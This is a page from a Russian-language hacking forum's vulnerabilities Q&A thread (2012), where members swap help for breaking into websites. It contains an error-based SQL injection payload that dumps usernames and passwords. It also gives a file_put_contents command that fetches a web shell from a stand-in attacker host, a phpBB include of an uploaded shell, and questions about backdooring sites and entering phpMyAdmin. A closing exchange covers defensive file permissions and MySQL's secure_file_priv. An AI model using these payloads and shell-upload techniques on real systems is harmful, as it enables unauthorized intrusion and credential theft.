HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2068 из 2438 « Первая < 10681568196820182058 2064 2065 2066 2067 2068 2069 2070 2071 2072 207821182168 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #20671  
Старый 19.05.2012, 16:38
bodrich
Guest
Сообщений: n/a
Провел на форуме:
5709

Репутация: 0
По умолчанию
cat1vo, спасибо, но не помогло.

Цитата:
Сообщение от None  
1. wget'a возможно нету, или нету прав на диру.
Это я понял, просто спрашивал, что быть 100% увереным.

Цитата:
Сообщение от None  
2. Шелл можно загрузить в /tmp а потом его проинклюдить (user_sig='phpbb:include("/tmp/shell.bmp")')
Пробывал уже, не получается (
 
Ответить с цитированием

  #20672  
Старый 19.05.2012, 16:47
абвгдешка
Guest
Сообщений: n/a
Провел на форуме:
9121

Репутация: 1
По умолчанию
DELITE
 
Ответить с цитированием

  #20673  
Старый 19.05.2012, 16:51
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
to абвгдешка

Код:
Code:
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x GROUP BY MID((SELECT+CONCAT_WS(0x3a,user,pass)+from+users+limit+0,1), FLOOR(RAND(0)*2), 64))
 
Ответить с цитированием

  #20674  
Старый 19.05.2012, 16:56
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
to bodrich

У Вас не получается, потому как может стоять FreeBSD там нет wget'a там fetch стоит по умолчанию,a лучше делать через file_put_contents("shell.php",file_get_contents("h ttp://evilsite.com/shell.txt"))

Цитата:
Сообщение от None  
Пробывал уже, не получается (
Может уже есть там такой файл? И лейте в папку со смайлами!
 
Ответить с цитированием

  #20675  
Старый 20.05.2012, 17:14
Groove
Guest
Сообщений: n/a
Провел на форуме:
59158

Репутация: 2
По умолчанию
Ребята что можно сделать с такой проблемой - Есть данные бд от сайта но подключиться можно только по localhost , как быть с удаленным подключением ?
 
Ответить с цитированием

  #20676  
Старый 20.05.2012, 17:32
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
Никак!
 
Ответить с цитированием

  #20677  
Старый 20.05.2012, 20:26
stan0009
Guest
Сообщений: n/a
Провел на форуме:
39063

Репутация: 0
По умолчанию
Товарищи!

Тема: phpmyadmin

имеется доступ к /scripts/setup.php

точнее: версия 2.11.2.2

сплоиты не пашут.

Можно ли что-то сотворить чтобы войти в админку?

спасибо.

PS: на кнопки хоть тыкай, хоть нет: config.inc.php пуст,как добавить нового юзера понятия не имею
 
Ответить с цитированием

  #20678  
Старый 21.05.2012, 01:23
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию
Добрый вечер, парни. Вопрос такого характера. На днях столкнулся с, казалось бы идеальным вариантом заливки через GET-запрос в адресной строке браузера: file_priv == Y, MQ == off, раскрытие путей, все дела.

Быстро просканив директории сайта, на предмет каталогов, куда бы залить бекдор, меня везде ждал облом. Я списал это на отсутствие прав на запись.

Однако, поскольку сайт бы русскоязычный, я предположил, что там возможно присутствие папки Sape, которая всегда 0777. Так, вот имея все вводные данные, описанные выше, я не смог прочитать через load_file исходный код страницы index.php. Вообще никаких. /etc/passwd, мускульные конфиги - да, но только не файлы из каталогов самого сайта.

Я где-то читал, что мускул имеет возможную настройку, на запрет чтения файлов из каталога сайта, что именно и было в моем случае, как я понял. Был бы признателен за ссылки по этому вопросу - как настраивается подобная фича, где почитать?

Ведь это можно считать довольно неплохим рубежом защиты и для своего проекта.

Спасибо за любую помощь(в гугле не забанен, но что-то ничего не нашел, релевантное моему вопросу.)
 
Ответить с цитированием

  #20679  
Старый 21.05.2012, 02:11
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Га-Ноцри

если смотреть со стороны привилегий то Пользователь mysql находится в группе "others" для серверных файлов, стоит просто чмодить файлы веба, сделать нечитабельными для "others" и все станет на место

chmod 750, допустим

по поводу мускулного запрета (secure_file_priv) , читай тут
 
Ответить с цитированием

  #20680  
Старый 21.05.2012, 02:26
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию
Цитата:
Сообщение от Konqi  
Konqi said:
Га-Ноцри
если смотреть со стороны привилегий то Пользователь mysql находится в группе "others" для серверных файлов, стоит просто чмодить файлы веба, сделать нечитабельными для "others" и все станет на место
chmod 750, допустим
по поводу мускулного запрета (secure_file_priv) , читай
тут
Большое спасибо за пояснение. Вопрос исчерпан. Углубился в чтение
 
Ответить с цитированием
Ответ
Страница 2068 из 2438 « Первая < 10681568196820182058 2064 2065 2066 2067 2068 2069 2070 2071 2072 207821182168 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ